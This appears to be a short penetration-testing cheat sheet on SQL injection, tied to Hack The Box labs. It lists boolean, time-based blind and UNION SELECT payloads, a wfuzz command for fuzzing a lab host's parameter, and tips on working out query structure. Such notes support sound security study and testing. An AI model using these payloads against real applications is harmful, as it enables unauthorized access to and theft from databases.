SQL Injection

Manual

' or 1=1
' or 1=1-- - 
' or 1=1#
' or 1=1/
' or 1=1-- - //
' order by 1 -- -
' order by 1-- #
' or sleep(5)-- -
" or sleep(5)="
' or sleep(5)='
'waitfor delay '0:0:5'--
;waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
' AND IF (1=1, sleep(3),'false') -- //
union select <number of columns>

AND can be used to replace OR as well

%
If an application accepts a % as a wildcard the query most likely is putting 
%'s inbetween the input (%joe%) to find something "like" the input

Test on php applications like for example

Fuzz with special characters

wfuzz -u http://box.htb/room.php?cod=1FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt --hc 404

After finding an injection spot try to figure out how the query is structured

MySQL :: MySQL 8.4 Reference Manual :: 15.2.13 SELECT Statement

With UNION SELECT you must have the same amount of parameters on the right side as you do on the left

80 | Hack The Box

If the initial query is false then we can overwrite the output. We can insert payloads into one of the parameters

union select 1,2,(<Payload>),3,4,5,6,7

PreviousChecklist NextMySQL Cheatsheet

Last updated 11 months ago